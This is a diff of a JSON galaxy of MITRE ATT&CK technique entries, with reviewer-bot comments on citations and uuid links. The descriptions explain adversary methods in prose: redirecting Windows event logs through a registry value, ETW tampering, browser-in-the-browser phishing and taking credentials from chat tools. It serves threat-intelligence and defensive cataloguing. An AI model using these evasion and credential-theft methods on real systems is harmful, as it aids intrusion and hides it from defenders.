"https://attack.mitre.org/techniques/T1552/004",
"https://en.wikipedia.org/wiki/Public-key_cryptography",
"https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf",
- "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/"
+ "https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token",
+ "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436"
]
},
"related": [
@@ -20781,7 +21103,6 @@
"https://attack.mitre.org/techniques/T1498/002",
"https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/",
"https://blog.cloudflare.com/reflections-on-reflections/",
- "https://capec.mitre.org/data/definitions/490.html",
"https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf",
"https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf",
"https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/",
@@ -20883,6 +21204,35 @@
"uuid": "65013dd2-bc61-43e3-afb5-a14c4fa7437a",
"value": "Email Accounts - T1585.002"
},
+ {
+ "description": "Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.\n\nRather than accessing the stored chat logs (i.e., [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation (Citation: Slack Security Risks).",
+ "meta": {
+ "external_id": "T1552.008",
+ "kill_chain": [
+ "mitre-attack:credential-access"
+ ],
+ "mitre_data_sources": [
+ "Application Log: Application Log Content"
+ ],
+ "mitre_platforms": [
+ "Office 365",
+ "SaaS",
+ "Google Workspace"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1552/008",
+ "https://www.nightfall.ai/blog/saas-slack-security-risks-2020"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "9664ad0e-789e-40ac-82e2-d7b17fbe8fb3",
+ "value": "Chat Messages - T1552.008"
+ },
{
"description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
"meta": {
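Review bot: the new "Chat Messages - T1552.008" entry has a single `related` edge, `subtechnique-of` to dest-uuid `435dfb86-2697-4867-85b5-2fef496c0517`; a dangling dest-uuid passes JSON validation but silently breaks the parent/sub-technique graph, so please confirm that uuid resolves to the T1552 parent cluster in this same file. Placement is consistent with the file's uuid ordering (65013dd2 before 9664ad0e), and the `(Citation: Slack Security Risks)` key in the description has its URL in `refs` (nightfall.ai), so the entry is otherwise self-contained.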
@@ -20928,7 +21278,7 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1595/002",
- "https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning"
+ "https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning"
]
},
"related": [
@@ -20941,7 +21291,7 @@
"value": "Vulnerability Scanning - T1595.002"
},
{
- "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider
cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.\n\nIn Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).",
+ "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nFor example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security
to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) \n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider
cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.\n\nIn Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).",
"meta": {
"external_id": "T1562.006",
"kill_chain": [
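Review bot: the added sentence wraps `File` in markdown backticks while `Set-EtwTraceProvider` in the same description string carries no such markup; check which inline-code convention the galaxy renderer honours so the two render alike. The new `(Citation: disable_win_evt_logging)` key is matched by the ptylu.github.io URL added in the refs hunk below, so citation and ref stay in step. If this entry's `mitre_data_sources` does not already list Windows Registry key modification, the registry-value example just added is the reason it should.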
@@ -20959,9 +21309,9 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1562/006",
- "https://capec.mitre.org/data/definitions/571.html",
"https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events",
"https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63",
+ "https://ptylu.github.io/content/report/report.html?report=25",
"https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/",
"https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A"
]
@@ -20976,7 +21326,7 @@
"value": "Indicator Blocking - T1562.006"
},
{
- "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). 
Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").(Citation: CISA IDN ST05-016)\n\nAdversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)",
+ "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").(Citation: CISA IDN ST05-016)\n\nAdversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. 
(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)",
"meta": {
"external_id": "T1566.002",
"kill_chain": [
@@ -20998,7 +21348,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1566/002",
"https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks",
- "https://capec.mitre.org/data/definitions/163.html",
"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide",
"https://us-cert.cisa.gov/ncas/tips/ST05-016",
"https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf",
@@ -21015,7 +21364,7 @@
"value": "Spearphishing Link - T1566.002"
},
{
- "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.",
+ "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.",
"meta": {
"external_id": "T1586.002",
"kill_chain": [
@@ -21026,7 +21375,8 @@
],
"refs": [
"https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/",
- "https://attack.mitre.org/techniques/T1586/002"
+ "https://attack.mitre.org/techniques/T1586/002",
+ "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/"
]
},
"related": [
@@ -21155,9 +21505,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1543/003",
- "https://capec.mitre.org/data/definitions/478.html",
- "https://capec.mitre.org/data/definitions/550.html",
- "https://capec.mitre.org/data/definitions/551.html",
"https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697",
"https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection",
"https://technet.microsoft.com/en-us/library/cc772408.aspx",
@@ -21248,8 +21595,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1543/004",
"https://bradleyjkemp.dev/post/launchdaemon-hijacking/",
- "https://capec.mitre.org/data/definitions/550.html",
- "https://capec.mitre.org/data/definitions/551.html",
"https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html",
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf",
"https://www.real-world-systems.com/docs/launchdPlist.1.html",
@@ -21537,7 +21882,7 @@
"value": "DNS Calculation - T1568.003"
},
{
- "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",
+ "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",
"meta": {
"external_id": "T1583.006",
"kill_chain": [
@@ -21640,7 +21985,7 @@
"value": "Employee Names - T1589.003"
},
{
- "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. \n\nFrom the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
+ "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site.\n\nAdversaries may also link to \"web bugs\" or \"web beacons\" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug)\n\nAdversaries may also be able to spoof a complete website using what is known as a \"browser-in-the-browser\" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)\n\nFrom the fake website, information is gathered in web forms and sent to the adversary. 
Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
"meta": {
"external_id": "T1598.003",
"kill_chain": [
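Review bot: the web bug / web beacon sentence removed from "Spearphishing Link - T1566.002" earlier in this diff reappears here under T1598.003 with a new `(Citation: NIST Web Bug)` key, alongside the new browser-in-the-browser paragraph with `(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)`. All three URLs land in the refs hunk that follows, so nothing dangles, but the commit message should mention the T1566.002 to T1598.003 move so that anyone diffing the galaxy does not read the T1566.002 change as dropped content.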
@@ -21656,10 +22001,13 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1598/003",
+ "https://csrc.nist.gov/glossary/term/web_bug",
"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide",
+ "https://mrd0x.com/browser-in-the-browser-phishing-attack/",
"https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf",
"https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages",
- "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html"
+ "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html",
+ "https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials"
]
},
"related": [
@@ -21690,7 +22038,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1574/004",
- "https://capec.mitre.org/data/definitions/471.html",
"https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html",
"https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py",
"https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py",
@@ -21799,7 +22146,6 @@
"refs": [
"http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/",
"https://attack.mitre.org/techniques/T1546/008",
- "https://capec.mitre.org/data/definitions/558.html",
"https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html",
"https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
"https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom"
@@ -21815,7 +22161,7 @@
"value": "Accessibility Features - T1546.008"
},
{
- "description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.",
+ "description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.",
"meta": {
"external_id": "T1584.006",
"kill_chain": [
@@ -21962,7 +22308,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1547/009",
- "https://capec.mitre.org/data/definitions/132.html",
"https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence",
"https://www.youtube.com/watch?v=nJ0UsyiUEqQ"
]
@@ -22444,7 +22789,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1053",
- "https://capec.mitre.org/data/definitions/557.html",
"https://technet.microsoft.com/en-us/library/cc785125.aspx",
"https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"
]
@@ -22488,7 +22832,7 @@
"value": "Develop KITs/KIQs - T1227"
},
{
- "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)",
+ "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)",
"meta": {
"external_id": "T1529",
"kill_chain": [
@@ -22664,7 +23008,6 @@
"refs": [
"https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/",
"https://attack.mitre.org/techniques/T1200",
- "https://capec.mitre.org/data/definitions/440.html",
"https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html",
"https://www.youtube.com/watch?v=fXthwl6ShOg",
"https://www.youtube.com/watch?v=lDvf4ScWbcQ"
@@ -22703,7 +23046,7 @@
"value": "Data Compressed - T1002"
},
{
- "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring) (Citation: GCP Packet Mirroring) (Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. 
(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)",
+ "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. 
For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)\n\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)",
"meta": {
"external_id": "T1040",
"kill_chain": [
@@ -22723,12 +23066,13 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1040",
- "https://capec.mitre.org/data/definitions/158.html",
"https://cloud.google.com/vpc/docs/packet-mirroring",
"https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html",
"https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview",
"https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512",
- "https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/"
+ "https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/",
+ "https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html",
+ "https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
},
"uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529",
@@ -22796,6 +23140,7 @@
"mitre-attack:defense-evasion"
],
"mitre_data_sources": [
+ "Application Log: Application Log Content",
"Command: Command Execution",
"File: File Deletion",
"File: File Metadata",
@@ -22806,6 +23151,7 @@
"Process: Process Creation",
"Scheduled Job: Scheduled Job Modification",
"User Account: User Account Authentication",
+ "User Account: User Account Deletion",
"Windows Registry: Windows Registry Key Deletion",
"Windows Registry: Windows Registry Key Modification"
],
@@ -22819,8 +23165,7 @@
"Google Workspace"
],
"refs": [
- "https://attack.mitre.org/techniques/T1070",
- "https://capec.mitre.org/data/definitions/93.html"
+ "https://attack.mitre.org/techniques/T1070"
]
},
"uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
@@ -22907,8 +23252,7 @@
"Network"
],
"refs": [
- "https://attack.mitre.org/techniques/T1110",
- "https://capec.mitre.org/data/definitions/49.html"
+ "https://attack.mitre.org/techniques/T1110"
]
},
"uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
@@ -22932,7 +23276,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1012",
- "https://capec.mitre.org/data/definitions/647.html",
